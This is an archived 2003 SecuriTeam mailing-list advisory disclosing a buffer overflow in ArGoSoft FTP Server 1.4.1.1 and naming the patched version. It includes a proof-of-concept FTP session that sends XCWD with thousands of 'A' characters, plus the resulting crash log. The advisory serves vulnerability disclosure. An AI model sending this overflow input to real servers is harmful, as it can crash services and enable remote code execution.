[NT] ArGoSoft FTP Server XCMD Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/03

  • Next message: SecuriTeam: "[TOOL] Windows Reverse Shellcode (under 300 Bytes, no spaces, no NULLs)" 
    To: list@securiteam.com
Date: 29 Sep 2003 14:21:57 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      ArGoSoft FTP Server XCMD Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.argosoft.com/applications/ftpserver/> ArGoSoft FTP Server is
    "a FTP server for Windows95/98/NT, and supports all basic FTP commands,
    and much more, such as passive mode, resuming file transfers, windows
    shortcuts to another files, folders and drives (including network drives),
    virtual domains (multiple IP homes), IP filtering, site specific commands,
    such as compressing and copying files on the server, changing date/time
    stamps, and so on".

    A buffer overflow vulnerability exists in the product that allows remote
    attackers to overflow an internal buffer, causing the product to execute
    arbitrary code.

    DETAILS

    Vulnerable systems:
     * ArGoSoft FTP Server version 1.4 (1.4.1.1)

    Immune systems:
     * ArGoSoft FTP Server version 1.4 (1.4.1.2)

    Example:
    c:\> putty.exe localhost 21
    220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
    user ftp
    502 Unknown command
    user ftp
    331 User name OK, need password
    pass ftp
    230 User ftp logged in successfully **
    XCWD AAAAAAA....(5000 times)
    client closed connection.

    In the log file you will you will see something like:
    9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
    9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
    9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
    in module 'ftpsrvnt.exe'. Write of address 41414145

    Vendor response:
    ArGoSoft has confirmed that there is a bug in the product. Version 1.4.1.2
    has been released, it can be downloaded from:
    <http://www.argosoft.com/applications/ftpserver/download.asp>
    http://www.argosoft.com/applications/ftpserver/download.asp.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:moran@moozatech.com> Moran
    Zavdi.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[TOOL] Windows Reverse Shellcode (under 300 Bytes, no spaces, no NULLs)"

    Relevant Pages